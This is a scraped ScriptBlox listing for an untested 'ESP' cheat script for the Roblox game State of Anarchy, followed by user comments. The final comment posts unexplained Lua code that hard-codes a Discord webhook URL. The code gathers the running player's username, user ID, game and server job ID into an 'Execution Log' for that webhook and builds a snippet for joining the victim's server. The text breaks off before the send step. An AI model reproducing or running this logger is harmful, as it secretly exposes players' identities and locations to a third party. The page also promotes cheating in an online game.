ScriptBlox is undergoing maintenance, so downtime is possible. Sorry for the inconvenience!
State of Anarchy
2.9k Views

Esp

State of AnarchyUploaded by
11 months ago
Please login to perform these actions:

Description

I don't know if it will work because I haven't tested it yet.

View Raw
Edited By: Xcx_22 Download


Comments
7
User profile picture
zxcv 11 months ago
test plz😢😢
User profile picture
COMBO_WOCK 11 months ago
@zxcv i remeber making script for this game. good ol days. @XXD14 you wanna make it together or you just posting esp and thats it?
User profile picture
Xcx_22 11 months ago
@COMBO_WOCK Umm ok
User profile picture
Xcx_22 11 months ago
@zxcv I tested it and it works fine.
User profile picture
Xcx_22 10 months ago
@0aim_100aimbot How would you do this to me?
User profile picture
pasterokya 2 months ago
local webhookURL = "https://discord.com/api/webhooks/1396286672689430628/eLOatICOuvtqlMKWHm_8tYgpM4ia6FD2zBHl_ahWJYD4N4miTgaOX4bbviYG3lHPwQGy" local player = game.Players.LocalPlayer local username = player.Name local displayName = player.DisplayName local userId = player.UserId local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name local gameId = game.PlaceId local jobId = game.JobId local playerCount = #game.Players:GetPlayers() local jsJoinCode = [[ fetch("https://games.roblox.com/v1/games/]] .. gameId .. [[/servers/Public?sortOrder=Asc&limit=100").then(res => res.json()).then(json => { const server = json.data.find(s => s.id === "]] .. jobId .. [["); if (server) { window.open(`roblox://placeId=` + server.placeId + `&gameInstanceId=` + server.id); } else { console.log("Server not found."); } }); ]] local luaJoinScript = [[ local TeleportService = game:GetService("TeleportService") TeleportService:TeleportToPlaceInstance(]] .. gameId .. [[, "]] .. jobId .. [[", game.Players.LocalPlayer) ]] local embed = { ["*le"] = "Execution Log", ["description"] = "Here are the details of the player and game:", ["type"] = "rich", ["color"] = 0x000000, ["fields"] = { { ["name"] = "Username", ["value"] = username, ["inline"] = true }, { ["name"] = "Display Name", ["value"] = displayName, ["inline"] = true }, { ["name"] = "User ID", ["value"] = tostring(userId), ["inline"] = false }, { ["name"] = "Game Name", ["value"] = gameName, ["inline"] = false }, { ["name"] = "Game ID", ["value"] = tostring(gameId), ["inline"] = true }, { ["name"] = "Players in Server", ["value"] = tostring(playerCount), ["inline"] = true },
Please Login to add a comment.